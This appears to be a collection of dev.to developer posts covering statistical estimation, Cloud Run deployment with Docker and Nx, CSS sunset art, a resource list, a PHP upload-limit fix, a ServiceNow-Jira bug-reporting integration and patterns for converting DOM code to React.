- **Point Estimate**: A single value, calculated from sample data, that serves as the best guess for the true value of the population parameter. It is denoted by a specific symbol, such as "x̄" for a point estimate of parameter "μ".
#### Properties of Point Estimates
- **Unbiasedness**: A point estimate is unbiased if its expected value is equal to the true value of the parameter being estimated.
- **Efficiency**: An efficient point estimate has the smallest possible variance among all unbiased estimators of the parameter.
- **Consistency**: A consistent point estimate converges to the true value of the parameter as the sample size increases.
#### Point Estimate Symbols
- Population Mean: "μ"
- Sample Mean: "x̄"
- Population Variance: "σ²"
- Sample Variance: "s²"
- Population Standard Deviation: "σ"
- Sample Standard Deviation: "s"
#### Example
Suppose we want to estimate the mean income of all households in a city. We collect a random sample of 100 households and calculate the mean income of the sample ("x̄"). We use "x̄" as our point estimate of the population mean income ("μ").
### Estimator
An estimator is a statistical function or rule used to estimate an unknown parameter of a population based on sample data. It calculates a point estimate, which serves as the best guess for the true value of the parameter.
#### Types of Estimators
1. **Unbiased Estimator**: An estimator whose expected value is equal to the true value of the parameter being estimated.
2. **Consistent Estimator**: An estimator that converges to the true value of the parameter as the sample size increases.
3. **Efficient Estimator**: An estimator with the smallest possible variance among all unbiased estimators of the parameter.
### Biased and Unbiased Estimators
#### Unbiased Estimator
An estimator is unbiased if its expected value is equal to the true value of the population parameter it is estimating. In other words, an unbiased estimator does not systematically overestimate or underestimate the parameter.
**Example: Sample Mean as an Unbiased Estimator of Population Mean**
- The sample mean ("x̄") is an unbiased estimator of the population mean ("μ"). This means that, on average, the sample mean will equal the population mean when taken over many samples.
**Formula for Sample Mean:**
```plaintext
x̄ = Σx / n
```
where:
- Σx is the sum of all sample values.
- n is the number of sample values.
#### Biased Estimator
An estimator is biased if its expected value is not equal to the true value of the population parameter it is estimating. A biased estimator systematically overestimates or underestimates the parameter.
**Example: Sample Variance as a Biased Estimator of Population Variance**
- The sample variance calculated using the formula with "n" in the denominator (instead of "n-1") is a biased estimator of the population variance ("σ²"). This formula tends to underestimate the true population variance, especially for small sample sizes.
**Biased Formula for Sample Variance:**
```plaintext
s²_biased = Σ(x - x̄)² / n
```
where:
- Σ(x - x̄)² is the sum of squared deviations from the sample mean.
- n is the number of sample values.
To correct this bias, we use Bessel's correction, replacing "n" with "n-1" in the denominator, which provides an unbiased estimator of the population variance.
**Unbiased Formula for Sample Variance:**
```plaintext
s²_unbiased = Σ(x - x̄)² / (n - 1)
```
where:
- Σ(x - x̄)² is the sum of squared deviations from the sample mean.
- n is the number of sample values.
### Hypothesis Testing
Hypothesis testing is a statistical method used to make inferences or draw conclusions about a population based on sample data. It involves making an initial assumption (the null hypothesis) and determining whether the sample data provides sufficient evidence to reject this assumption in favor of an alternative hypothesis.
#### Key Concepts
- **Null Hypothesis (H₀)**: The statement being tested, typically representing no effect or no difference. It is assumed to be true unless the data provides strong evidence against it.
- **Alternative Hypothesis (H₁ or Ha)**: The statement we want to test for, representing an effect or a difference. It is accepted if the null hypothesis is rejected.
- **Significance Level (α)**: The threshold for determining whether the evidence is strong enough to reject the null hypothesis. Common significance levels are 0.05, 0.01, and 0.10.
- **Test Statistic**: A standardized value calculated from sample data, used to determine whether to reject the null hypothesis. Different tests have different test statistics, such as the t-statistic or z-statistic.
- **p-value**: The probability of obtaining a test statistic as extreme as the one observed, assuming the null hypothesis is true. If the p-value is less than or equal to the significance level, we reject the null hypothesis.
- **Type I Error (α)**: The error made when the null hypothesis is wrongly rejected (false positive).
- **Type II Error (β)**: The error made when the null hypothesis is not rejected when it is false (false negative).
#### Steps in Hypothesis Testing
1. **State the Hypotheses**:
- Null Hypothesis (H₀): Example - The population mean is equal to a specified value (μ = μ₀).
- Alternative Hypothesis (H₁): Example - The population mean is not equal to the specified value (μ ≠ μ₀).
2. **Choose the Significance Level (α)**:
- Common choices are 0.05, 0.01, or 0.10.
3. **Select the Appropriate Test and Calculate the Test Statistic**:
- Depending on the sample size and whether the population standard deviation is known, choose a test (e.g., z-test, t-test).
- Calculate the test statistic using the sample data.
4. **Determine the p-value or Critical Value**:
- Compare the test statistic to a critical value from statistical tables or calculate the p-value.
5. **Make a Decision**:
- If the p-value ≤ α, reject the null hypothesis (H₀).
- If the p-value > α, do not reject the null hypothesis (H₀).
6. **Interpret the Results**:
- Draw conclusions based on the decision made in the previous step.
### Example: t-Test
The t-test is a statistical test used to determine whether there is a significant difference between the means of two groups or between a sample mean and a known population mean. It is particularly useful when the sample size is small and the population standard deviation is unknown.
#### Types of t-Tests
1. **One-Sample t-Test**: Tests whether the mean of a single sample is significantly different from a known population mean.
2. **Independent Two-Sample t-Test**: Tests whether the means of two independent samples are significantly different.
3. **Paired Sample t-Test**: Tests whether the means of two related groups (e.g., measurements before and after treatment) are significantly different.
#### Key Concepts
- **Null Hypothesis (H₀)**: The hypothesis that there is no effect or no difference. It assumes that any observed difference is due to sampling variability.
- **Alternative Hypothesis (H₁ or Ha)**: The hypothesis that there is an effect or a difference. It suggests that the observed difference is real and not due to chance.
- **Degrees of Freedom (df)**: The number of independent values or quantities that can vary in the analysis. It is used to determine the critical value from the t-distribution table.
- **Significance Level (α)**: The threshold for rejecting the null hypothesis. Common significance levels are 0.05, 0.01, and 0.10.
- **Test Statistic**: A value calculated from the sample data that is used to make a decision about the null hypothesis.
#### One-Sample t-Test
**Purpose**: To determine if the sample mean is significantly different from a known population mean.
**Formula**:
```plaintext
t = (x̄ - μ) / (s / √n)
```
where:
- x̄ is the sample mean.
- μ is the population mean.
- s is the sample standard deviation.
- n is the sample size.
**Steps**:
1. State the hypotheses.
- H₀: μ = μ₀
- H₁: μ ≠ μ₀
2. Choose the significance level (α).
3. Calculate the test statistic (t).
4. Determine the critical value or p-value.
5. Make a decision and interpret the results.
#### Independent Two-Sample t-Test
**Purpose**: To determine if the means of two independent samples are significantly different.
**Formula**:
```plaintext
t = (x̄₁ - x̄₂) / √[(s₁² / n₁) + (s₂² / n₂)]
```
where:
- x̄₁ and x̄₂ are the sample means.
- s₁² and s₂² are the sample variances.
- n₁ and n₂ are the sample sizes.
**Steps**:
1. State the hypotheses.
- H₀: μ₁ = μ₂
- H₁: μ₁ ≠ μ₂
2. Choose the significance level (α).
3. Calculate the test statistic (t).
4. Determine the degrees of freedom (df).
5. Determine the critical value or p-value.
6. Make a decision and interpret the results.
| harshm03 |
1,881,561 | Building PDF Open Source Services with Angular & GCP — Deploy services to Cloud Run | Welcome to the journey of building open source PDF service using Angular (Analogjs), Firestore, Cloud... | 0 | 2024-06-08T19:57:32 | https://dev.to/dalenguyen/building-pdf-open-source-services-with-angular-gcp-deploy-services-to-cloud-run-56i | angular, firebase, gcp, webdev | Welcome to the journey of building open source PDF service using Angular (Analogjs), Firestore, Cloud Storage, and CloudRun. This project serves as a platform for sharing my knowledge, continually learning best practices, and simultaneously contributing to the community.
Part 1: [Architecture Overview](https://dev.to/dalenguyen/building-pdf-open-source-services-with-angular-gcp-part-1-4pi3)
**Part 2: [Deploy services to Cloud Run](https://dev.to/dalenguyen/building-pdf-open-source-services-with-angular-gcp-deploy-services-to-cloud-run-56i)**
Demo: https://pdfun.xyz
GitHub: https://github.com/dalenguyen/pdfun
The solution is built around GCP ecosystem, it’s better to deploy the project on GCP, so it can access their services. There are two parts of the solution:
- Web UI (Analogjs — Angular): handle user interaction
- Backend (Node — Express): process PDF files
## Why Deploy to Cloud Run?
Cloud Run is a fully managed compute platform by Google Cloud Platform (GCP) that automatically scales your stateless containers. But why should we choose Cloud Run for deploying our services? Here are some reasons:
- Cloud Run is an excellent choice for deploying services due to its support for long-running tasks. Services can run for up to 60 minutes, accommodating tasks that require significant computation time.
- In addition to this, Cloud Run offers benefits such as automatic scaling, a developer-friendly environment, integrated logging and monitoring, a pay-per-use pricing model, and portability across different platforms. This makes it a versatile and cost-effective solution for deploying our PDF service.
## Deploying to Google Cloud Run using Docker
Cloud Run using a docker image to deploy its service, so what we need to do is to wrap our applications into a image.
### Prerequisites
Before we begin, make sure you have the following:
- A Google Cloud project with billing enabled.
- Docker installed on your local machine.
- The Google Cloud SDK installed and initialized.
Please follow the Deploying to Cloud Run documentation for further instruction.
### Build Your Docker Image
Next, you will need to build your project and the Docker image. This can be done using the docker build command. Make sure to tag your image with the registry name. For example:
```
// build-new-image.sh
imageTag=${REGION}-docker.pkg.dev/$GCLOUD_PROJECT/$REPO/$image
docker build -t $imageTag -f Dockerfile --platform linux/x86_64 .
```
Replace REGIONS, GCLOUD_PROJECT, REPO and image with your Google Cloud project ID, your image name, and your image tag, respectively.
### Push Your Image to the Artifact Registry
Once your image is built, you can push it to the Artifact Registry using the docker push command:
```
docker push $imageTag
```
### Create a New Service in Cloud Run
With your image now in the Artifact Registry, you can create a new service in Cloud Run. You can run the following command to deploy the PDF service:
```
gcloud run deploy pdfun \
--image=us-central1-docker.pkg.dev/pdfun-prod/pdf/pdfun \
--platform=managed --project=pdfun-prod --region=us-central1 \
--allow-unauthenticated
```
This command will deploy the Web UI with service name pdfun to Cloud Run and allows every one to access the website (`--allow-unauthenticated`).
## Bonus: Utilizing Nx to deploy services
> Nx is a development framework designed for building applications inside monorepos. Monorepos contain multiple apps inside a single Git repository, allowing organizations to share code, such as components and utility libraries, across apps and teams. Nx handles many monorepo use cases like build systems, inbuilt tools, and smart caching.
When it comes to deploying services, Nx offers a streamlined process. After configuration, all I need to do is to run yarn deploy in order deploy only affected apps. For example, if I only update the frontend, then the frontend is the only app that will be built and deployed.
Here is what happens under the hood after I run the deploying command:
```
npx nx affected -t deploy --base=main~1 --head=main
```
This command will run the deploy target under project.json for affected projects by comparing the commit and the latest commit on main branch.
Let’s have a look at the `project.json` for the pdfun application:
```
// project.json
...
"deploy": {
"executor": "nx:run-commands",
"options": {
"commands": ["nx deploy-docker pdf", "nx deploy-cloudrun pdf"],
"color": true,
"parallel": false
},
"dependsOn": [
{
"target": "build"
}
]
},
"deploy-cloudrun": {
"command": "gcloud run deploy pdfun --image=us-central1-docker.pkg.dev/pdfun-prod/pdf/pdfun --platform=managed --project=pdfun-prod --region=us-central1 --allow-unauthenticated"
},
"deploy-docker": {
"command": "./build-new-image.sh --dir dist/pdf/analog --image pdfun",
"parallel": false,
"dependsOn": [
{
"target": "copy"
}
]
},
```
So, when the `deploy` target runs, it will trigger two other commands:
```
npx nx deploy-docker pdf
npx nx deploy-cloudrun pdf
```
These commands in turn will build the docker image, push the image and deploy the Cloud Run service based on the uploaded image on Artifact Registry.
Here is the result:
```
dalenguyen$ yarn deploy
yarn run v1.22.19
$ npx nx affected -t deploy --base=main~1 --head=main
NX Running target deploy for 2 projects and 3
NX Running target deploy for 2 projects and 3 tasks they depend on
✔ nx run domain:build (6s)
———————————————————————————————————————————————
✔ nx run pdf:build:production (17s)
———————————————————————————————————————————————
✔ nx run pdf:deploy (17s)
✔ nx run pdf-on-create:deploy (29s)
———————————————————————————————————————————————
NX Successfully ran target deploy for 2 projects and 3 tasks they depend on (37s)
```
You can see that the by utilizing the build cache, two services were build and deploy in about 1 minute locally!
## Questions?
If you have any questions or run into any issues, please don’t hesitate to create an issue on our GitHub repository. Alternatively, you can chat with me. I’m here to help and would love to hear your feedback.
Stay tuned for the next part. Until then, happy coding! | dalenguyen |
1,877,275 | Frontend Challenge: June Beach Sunset | This is a submission for Frontend Challenge v24.04.17, CSS Art: June. Inspiration June... | 27,182 | 2024-06-08T19:45:26 | https://dev.to/jarvisscript/frontend-challenge-june-beach-sunset-48pa | frontendchallenge, devchallenge, css | _This is a submission for [Frontend Challenge v24.04.17](https://dev.to/challenges/frontend-2024-05-29), CSS Art: June._
## Inspiration
June can mean travel and beach sunsets. I made a CSS Sunset.
## Demo
<!-- Show us your CSS Art! You can directly embed an editor into this post (see the FAQ section of the challenge page) or you can share an image of your project and share a public link to the code. -->

```html
<div class="flex-container">
<div class="main">
<div class="outer_frame">
<div class="wrapper_container">
<div class="wrapper">
<div class="sky">
<div class="sun"></div>
</div>
<div class="ocean">
<div class="reflect">
<div class="wave_group_sun">
<div class="wave"></div>
<div class="wave"></div>
<div class="wave"></div>
<div class="wave"></div>
<div class="wave"></div>
<div class="wave"></div>
<div class="wave"></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
```
```css
.wrapper_container {
width: 900px;
height: 400px;
display: flex;
align-items: center;
}
.wrapper{
display: flex;
justify-content: center;
flex-direction: column;
position: absolute;
overflow: hidden;
}
.sky {
width: 900px;
height: 250px;
background:
linear-gradient( to top,
var(--Yellow) 14%,
orange,
var(--Red),
var(--Pink)
);
display: flex;
justify-content: center;
}
.ocean {
width: 900px;
height: 250px;
background: linear-gradient(#4981b3, navy);
border-top: 2px solid #3030a0c9;
display: flex;
overflow: hidden;
justify-content: center;
position: relative;
}
.sun{
width: 200px;
height: 422px;
transform: rotate(90deg);
border-radius: 50%;
margin-top: 48px;
background: linear-gradient(to left,
rgb(255 215 0 / 38%),
#ffa5007d, rgb(255 0 0 / 26%),
rgb(255 0 167 / 34%));
filter: drop-shadow(-2px 2px 13px #FF5722);
}
.reflect {
width: 200px;
height: 422px;
transform: rotate(90deg);
border-radius: 50%;
margin-top: -200px;
background: linear-gradient(to left,
rgb(255 215 0 / 38%)
#ffa5007d, rgb(255 0 0 / 26%),
rgb(255 0 167 / 34%));
filter: drop-shadow(-2px 2px 13px var(--Red));
filter: blur(4px);
}
.wave_group_sun{
transform: rotate(90deg);
position: relative;
justify-content: space-evenly;
}
.wave {
background: var(--White);
height: 3px;
width: auto;
border-radius: 20%;
margin-bottom: 68px;
filter: blur(2px);
}
```
## Journey
The sunset is made using multiple gradients. The sky uses Yellow, red, orange and pink. Going from bottom to top. Originally it was top to bottom but that blended too much with the Sun.
The sun and reflection uses similar colors flowing right to left in a rotated circle. With the reflection using a bit of `blur`.
The Ocean is made of blue gradients with white lines for wave crests.
A view with a background.
 | jarvisscript |
1,881,558 | Awesome List | Hi Everybody, i want to share with you all a little awesome file Where you guys can find some... | 0 | 2024-06-08T19:45:25 | https://dev.to/litlyx/awesome-list-3pdc | awesome, opensource, javascript, beginners | Hi Everybody, i want to share with you all a little
> awesome file
**Where you guys can find some valuable stuffs.**
## Awesome List
A curated list of awesome programming languages, resources, tools, and libraries.
## Table of Contents
- [Programming Languages](#programming-languages)
- [Web Development](#web-development)
- [Data Science](#data-science)
- [Machine Learning](#machine-learning)
- [DevOps](#devops)
- [Open Source Projects](#open-source-projects)
## Programming Languages
- **[Python](https://www.python.org/)** - A powerful, versatile programming language.
- [Real Python](https://realpython.com/) - Tutorials and articles.
- [Awesome Python](https://github.com/vinta/awesome-python) - A curated list of awesome Python frameworks, libraries, software, and resources.
- **[JavaScript](https://developer.mozilla.org/en-US/docs/Web/JavaScript)**
- [MDN Web Docs](https://developer.mozilla.org/en-US/docs/Web/JavaScript) - Comprehensive JavaScript documentation.
- [JavaScript Info](https://javascript.info/) - Modern JavaScript tutorial.
- [Awesome JavaScript](https://github.com/sorrycc/awesome-javascript) - A collection of awesome browser-side JavaScript libraries, resources, and shiny things.
## Web Development
- **[Frontend Development](https://developer.mozilla.org/en-US/docs/Learn/Front-end_web_developer)**
- [React](https://reactjs.org/) - A JavaScript library for building user interfaces.
- [Vue.js](https://vuejs.org/) - The Progressive JavaScript Framework.
- [Awesome Frontend](https://github.com/dypsilon/frontend-dev-bookmarks) - A huge list of frontend resources.
- **[Backend Development](https://developer.mozilla.org/en-US/docs/Learn/Server-side)**
- [Node.js](https://nodejs.org/) - JavaScript runtime built on Chrome's V8 JavaScript engine.
- [Django](https://www.djangoproject.com/) - A high-level Python web framework.
- [Awesome Backend](https://github.com/veggiemonk/awesome-docker) - A curated list of Docker resources and projects.
## Data Science
- [Pandas](https://pandas.pydata.org/) - A powerful data analysis and manipulation library for Python.
- [Pandas Documentation](https://pandas.pydata.org/docs/) - Official documentation.
- [NumPy](https://numpy.org/) - The fundamental package for scientific computing with Python.
- [NumPy Documentation](https://numpy.org/doc/) - Official documentation.
- [Awesome Data Science](https://github.com/academic/awesome-datascience) - An awesome Data Science repository.
## Machine Learning
- [TensorFlow](https://www.tensorflow.org/) - An end-to-end open source machine learning platform.
- [TensorFlow Documentation](https://www.tensorflow.org/learn) - Tutorials and documentation.
- [PyTorch](https://pytorch.org/) - An open source machine learning framework.
- [PyTorch Tutorials](https://pytorch.org/tutorials/) - Tutorials and documentation.
- [Awesome Machine Learning](https://github.com/josephmisiti/awesome-machine-learning) - A curated list of awesome Machine Learning frameworks, libraries, and software.
## DevOps
- [Docker](https://www.docker.com/) - A platform for developing, shipping, and running applications.
- [Docker Documentation](https://docs.docker.com/) - Official documentation.
- [Kubernetes](https://kubernetes.io/) - An open-source system for automating deployment, scaling, and management of containerized applications.
- [Kubernetes Documentation](https://kubernetes.io/docs/home/) - Official documentation.
- [Awesome DevOps](https://github.com/DevOpsCube/awesome-devops) - A curated list of awesome DevOps tools and practices.
## Open Source Projects
- [FreeCodeCamp](https://www.freecodecamp.org/) - Learn to code for free.
- [GitHub Repository](https://github.com/freeCodeCamp/freeCodeCamp) - The main FreeCodeCamp repository.
- [TensorFlow](https://www.tensorflow.org/) - An end-to-end open source machine learning platform.
- [GitHub Repository](https://github.com/tensorflow/tensorflow) - The main TensorFlow repository.
- [Vue.js](https://vuejs.org/) - The Progressive JavaScript Framework.
- [GitHub Repository](https://github.com/vuejs/vue) - The main Vue.js repository.
**Are you guys like this kind of posts?? Tell me down below! Let's have a talk!**
I will be happy to do more curated posts like this!
Leave a Star on our open-source [Repo](https://github.com/Litlyx/litlyx) if you want!
Antonio, CEO & Founder at [Litlyx.com](https://litlyx.com)
| litlyx |
1,881,510 | The uploaded file exceed the upload_max_filesize directive in php.ini | Problem My programmer has this error while uploading file in wordpress ... | 0 | 2024-06-08T19:19:46 | https://dev.to/bukanspot/the-uploaded-file-exceed-the-uploadmaxfilesize-directive-in-phpini-5735 | php, wordpress | ## Problem
My programmer has this error while uploading file in wordpress

## Solution
Find php.ini file location
```bash
php -i | grep 'php.ini'
```
Change this value inside in `php.ini`
```ini
upload_max_filesize = 12M
post_max_size = 13M
memory_limit = 15M
```
Or add this code to first line of `.htaccess` file _(is located in WordPress installation directory)_
```
php_value upload_max_filesize 12M
php_value post_max_size 13M
php_value memory_limit 15M
```
Note:
- Change the file size with your case study
## Reference
- https://stackoverflow.com/questions/8684609/where-can-i-find-php-ini
- https://kinsta.com/knowledgebase/the-uploaded-file-exceeds-the-upload_max_filesize-directive-in-php-ini/ | bukanspot |
1,881,557 | Where to buy trucker hats in 2024 ? | Hey everyone, I recently stumbled upon a fantastic website called trucker-hats.com while searching... | 0 | 2024-06-08T19:44:10 | https://dev.to/christianjj/where-to-buy-trucker-hats-in-2024--5gg1 | Hey everyone,
I recently stumbled upon a fantastic website called trucker-hats.com while searching for a good place to [**buy trucker hats online**](https://trucker-hats.com/). I must say, I was pleasantly surprised by what I found! This site has a huge library of caps to choose from. Crazy!
What impressed me the most was how quickly my order arrived. The **delivery was fast**, and the quality of the hats exceeded my expectations. I'm really satisfied with my purchase and thought it would be great to share this find with all of you.
Has anyone else ordered from TruckerHats ? What was your experience like?
**But more importantly**, would you recommend any other sites for purchasing trucker hats?
Looking forward to hearing your opinions and experiences!
Cheers! :-) | christianjj | |
1,881,556 | Connecting ServiceNow to Jira | Creating a seamless integration for automatic bug reporting Introduction: In this guide, we'll... | 0 | 2024-06-08T19:39:13 | https://dev.to/vivek_soni/connecting-servicenow-to-jira-4390 | jira, servicenow, api, javascript |
*Creating a seamless integration for automatic bug reporting*
---
**Introduction**:
In this guide, we'll walk through the process of integrating ServiceNow's Automated Test Framework (ATF) with Jira. This integration enables automatic bug reporting whenever a test case fails, streamlining the communication between testing and development teams. While this is a personalized approach, it can be adapted to integrate Jira with other functionalities of ServiceNow.
---
**Understanding the Workflow:**
1) **Identifying Triggers:**
We'll set up a business rule in ServiceNow to trigger whenever a test case fails. This rule will be activated when a new entry is inserted in the `sys_atf_test_result` table indicating a failure.
> **Why Use a Business Rule?**
> A business rule in ServiceNow allows you to execute server-side logic whenever records are inserted, updated, deleted, or queried. It helps automate processes and ensure that specific actions are taken under defined conditions. In this case, the business rule will detect test failures and trigger the creation of a Jira bug.

- Navigating to the `sys_atf_test_result` table
- Setting up the business rule with the correct conditions
2) **Utilizing Jira API:**
We'll leverage the Jira API to create a bug issue in Jira automatically. It's essential to understand the structure of the Jira API. Initially, you can test the API using tools like Postman to ensure it works as expected.
{% embed https://developer.atlassian.com/server/jira/platform/rest-apis/ %}
---
**Implementation Steps:**
3) **Setting Up Credentials:**
First, securely store your Jira API token and username in ServiceNow. This ensures that your credentials are safely accessed later during the integration process.
**Steps:**
- Navigate to the credentials section in ServiceNow.
- Input your Jira username and API token.

- Storing credentials in ServiceNow
4) **Writing the Business Rule:**
- Navigate to the `sys_atf_test_result` table either by searching it in the All section or directly entering its name followed by `.list` in the search.
- Create a business rule triggered on update when the status is 'fail'.
**Steps:**
- Go to `sys_atf_test_result` table.
- Right-click on the table header > Configure > Business Rule.
- Ensure 'Advanced' is checked since we will write code.
- Set "When to run" to "After" and check "Update" only.

**Filter Condition:**
- Status is 'fail'.
- Accessing the `sys_atf_test_result` table
- Configuring the business rule settings

5) **Integration with Jira:**
Using the ServiceNow web service (sn_ws), we will send a REST message to Jira to create a bug issue.
**Code Snippet:**
```javascript
var request = new sn_ws.RESTMessageV2();
request.setEndpoint("https://yourcompany.atlassian.net/rest/api/3/issue"); // Replace with a generic URL
request.setHttpMethod("POST");
var provider = new sn_cc.StandardCredentialsProvider();
var credential = provider.getCredentialByID('your_credential_id');
var user = credential.getAttribute("user_name");
var password = credential.getAttribute("password");
request.setBasicAuth(user, password);
request.setRequestHeader('Accept', 'application/json');
request.setRequestHeader('Content-Type', 'application/json');
```
- Writing and testing the REST message code
- Setting up credentials in the script
6) **Constructing the Request Body:**
Retrieve the necessary data such as summary and description from the `sys_atf_test_result_step` table, ensuring to filter for the current test result.
**Code Snippet:**
```javascript
var testSteps = new GlideRecord('sys_atf_test_result_step');
testSteps.addQuery("status", 'Failure');
testSteps.addQuery("test_result", current.sys_id);
testSteps.query();
testSteps.next();
var des = testSteps.description;
var summary = testSteps.summary;
// Formatting summary and description
summary = summary.replace(/['"]/g, '');
if (summary.includes("\n")) {
summary = summary.replace(/\n/g, ' ');
}
var arr = des.split("\n");
des = "";
for (var j = 0; j < arr.length; j++) {
des += "{\"type\": \"paragraph\",\"content\": [{\"type\": \"text\",\"text\": \"" + arr[j] + "\"}]},";
}
des = des.substring(0, des.length - 1);
var body = "{\"fields\": {\"project\":{\"key\": \"PROJECT_KEY\"},\"summary\":\"" + summary + " " + current.status + "\",\"description\": {\"version\": 1,\"type\": \"doc\",\"content\": [" + des + "]},\"issuetype\": {\"name\": \"Bug\"}}}";
request.setRequestBody(body);
var response = request.execute();
```
- Querying and retrieving test step data
- Formatting the retrieved data
---
**Conclusion:**
By following these steps, you can seamlessly integrate ServiceNow ATF with Jira to automate bug reporting. This approach streamlines the process, ensuring efficient communication between testing and development teams. Feel free to adapt this framework to suit other integration needs within your organization.
**Additional Tips:**
- Regularly test the integration to ensure seamless functionality.
- Keep credentials secure to prevent unauthorized access.
- Document the integration process for future reference and troubleshooting.
--- | vivek_soni |
1,881,555 | What Makes a Great Developer Onboarding Process? | Hey Devs! A bad onboarding process can be costly and lead to high turnover, with the biggest... | 0 | 2024-06-08T19:34:11 | https://dev.to/jwtiller_c47bdfa134adf302/what-makes-a-great-developer-onboarding-process-2jhj | discuss, development, career, onboarding | Hey Devs!
A bad onboarding process can be costly and lead to high turnover, with the biggest consequence being that people quit. Let’s discuss how to make onboarding effective and enjoyable. Here are some questions to get the conversation started:
🌟 What was the best onboarding experience you’ve had?
📋 Which onboarding practices do you find most helpful?
🛠️ What essential tools or resources should be provided to new developers?
💻 How can remote onboarding be improved?
🧑🤝🧑 What role does mentorship play in successful onboarding?
📚 How important is documentation in the onboarding process?
🚧 What challenges have you faced during onboarding, and how were they addressed?
Anything I missed or you want to add? Looking forward to your insights! | jwtiller_c47bdfa134adf302 |
1,881,554 | Patterns that indicate DOM dynamic behavior and corresponding React code. | When converting JavaScript code to React code and deciding when to use useState, you need to look for... | 0 | 2024-06-08T19:27:32 | https://dev.to/forchapearl/patterns-that-indicate-dom-dynamic-behavior-and-corresponding-react-code-1ig7 | react, html, conversion, dom | When converting JavaScript code to React code and deciding when to use `useState`, you need to look for patterns that indicate dynamic behavior. Dynamic behavior in a web application typically involves changes in the DOM based on user interactions or other events. Here are some common changes that suggest the need for state management:
### 1. **Changes in Element Visibility**
- **Example**: Showing or hiding elements based on user actions.
- **Pattern**: Manipulating `display` style, toggling CSS classes that control visibility (like adding/removing a `hidden` class).
### JavaScript Example
```javascript
var element = document.getElementById('element');
element.style.display = 'none'; // Hides the element
```
### React Conversion
```javascript
const [isVisible, setIsVisible] = useState(true);
// Toggling visibility
<div style={{ display: isVisible ? 'block' : 'none' }}>Content</div>
```
### 2. **Changes in Text Content**
- **Example**: Updating button text or other text content based on actions.
- **Pattern**: Directly setting `textContent` or `innerHTML`.
### JavaScript Example
```javascript
button.textContent = 'New Text';
```
### React Conversion
```javascript
const [buttonText, setButtonText] = useState('Initial Text');
<button onClick={() => setButtonText('New Text')}>{buttonText}</button>
```
### 3. **Toggling CSS Classes**
- **Example**: Adding or removing CSS classes based on conditions.
- **Pattern**: Using `classList.add`, `classList.remove`, or `classList.toggle`.
### JavaScript Example
```javascript
element.classList.add('active');
```
### React Conversion
```javascript
const [isActive, setIsActive] = useState(false);
<div className={isActive ? 'active' : ''}>Content</div>
```
### 4. **Form Input Values**
- **Example**: Handling input changes.
- **Pattern**: Reading or setting `value` on input elements.
### JavaScript Example
```javascript
input.value = 'new value';
```
### React Conversion
```javascript
const [inputValue, setInputValue] = useState('');
<input value={inputValue} onChange={(e) => setInputValue(e.target.value)} />
```
### 5. **Attributes**
- **Example**: Modifying attributes like `disabled`, `checked`, or `src`.
- **Pattern**: Directly setting attributes on elements.
### JavaScript Example
```javascript
element.disabled = true;
```
### React Conversion
```javascript
const [isDisabled, setIsDisabled] = useState(false);
<button disabled={isDisabled}>Click me</button>
```
### 6. **Conditional Rendering**
- **Example**: Rendering different components or elements based on conditions.
- **Pattern**: Using `if` statements or ternary operators to append/remove elements.
### JavaScript Example
```javascript
if (condition) {
document.body.appendChild(element);
} else {
document.body.removeChild(element);
}
```
### React Conversion
```javascript
const [condition, setCondition] = useState(false);
{condition ? <Component /> : null}
```
### 7. **Dynamic Styles**
- **Example**: Changing inline styles dynamically.
- **Pattern**: Setting the `style` attribute with dynamic values.
### JavaScript Example
```javascript
element.style.color = 'red';
```
### React Conversion
```javascript
const [color, setColor] = useState('black');
<div style={{ color }}>Text</div>
```
### 8. **Lists and Arrays**
- **Example**: Rendering lists based on array data.
- **Pattern**: Adding/removing items in arrays and updating the DOM accordingly.
### JavaScript Example
```javascript
const items = ['Item 1', 'Item 2'];
const ul = document.createElement('ul');
items.forEach(item => {
const li = document.createElement('li');
li.textContent = item;
ul.appendChild(li);
});
document.body.appendChild(ul);
```
### React Conversion
```javascript
const [items, setItems] = useState(['Item 1', 'Item 2']);
<ul>
{items.map((item, index) => (
<li key={index}>{item}</li>
))}
</ul>
```
### 9. **Dynamic List Manipulation**
- **Example**: Adding, removing, or updating items in a list based on user actions.
- **Pattern**: Manipulating array content and rendering it to the DOM.
### JavaScript Example
```javascript
let list = document.getElementById('list');
let items = ['Item 1', 'Item 2'];
items.forEach(item => {
let li = document.createElement('li');
li.textContent = item;
list.appendChild(li);
});
// Adding an item
let newItem = 'Item 3';
items.push(newItem);
let newLi = document.createElement('li');
newLi.textContent = newItem;
list.appendChild(newLi);
```
### React Conversion
```javascript
const [items, setItems] = useState(['Item 1', 'Item 2']);
// Adding an item
const addItem = () => {
setItems([...items, 'Item 3']);
};
return (
<ul>
{items.map((item, index) => (
<li key={index}>{item}</li>
))}
</ul>
);
```
### 10. **Form Input Handling**
- **Example**: Handling form input changes and validations.
- **Pattern**: Listening for input events and updating values.
### JavaScript Example
```javascript
let input = document.getElementById('input');
input.addEventListener('input', function(event) {
console.log(event.target.value);
});
```
### React Conversion
```javascript
const [inputValue, setInputValue] = useState('');
return (
<input
value={inputValue}
onChange={(e) => setInputValue(e.target.value)}
/>
);
```
### 11. **Animation Triggers**
- **Example**: Triggering CSS animations based on user interactions.
- **Pattern**: Adding/removing CSS classes to start animations.
### JavaScript Example
```javascript
let box = document.getElementById('box');
box.addEventListener('click', function() {
box.classList.add('animate');
});
```
### React Conversion
```javascript
const [animate, setAnimate] = useState(false);
return (
<div
id="box"
className={animate ? 'animate' : ''}
onClick={() => setAnimate(true)}
/>
);
```
### 12. **Data Fetching**
- **Example**: Fetching data from an API and updating the DOM.
- **Pattern**: Making asynchronous requests and rendering results.
### JavaScript Example
```javascript
fetch('https://api.example.com/data')
.then(response => response.json())
.then(data => {
document.getElementById('data').textContent = JSON.stringify(data);
});
```
### React Conversion
```javascript
const [data, setData] = useState(null);
useEffect(() => {
fetch('https://api.example.com/data')
.then(response => response.json())
.then(data => setData(data));
}, []);
return <div id="data">{data ? JSON.stringify(data) : 'Loading...'}</div>;
```
### 13. **Timer or Interval Updates**
- **Example**: Updating the DOM based on time intervals.
- **Pattern**: Using `setInterval` or `setTimeout` to trigger updates.
### JavaScript Example
```javascript
let counter = 0;
setInterval(() => {
document.getElementById('counter').textContent = counter++;
}, 1000);
```
### React Conversion
```javascript
const [counter, setCounter] = useState(0);
useEffect(() => {
const interval = setInterval(() => {
setCounter(prevCounter => prevCounter + 1);
}, 1000);
return () => clearInterval(interval);
}, []);
return <div id="counter">{counter}</div>;
```
### 14. **Conditional Component Rendering**
- **Example**: Showing different components based on a condition.
- **Pattern**: Using `if` statements or ternary operators to toggle elements.
### JavaScript Example
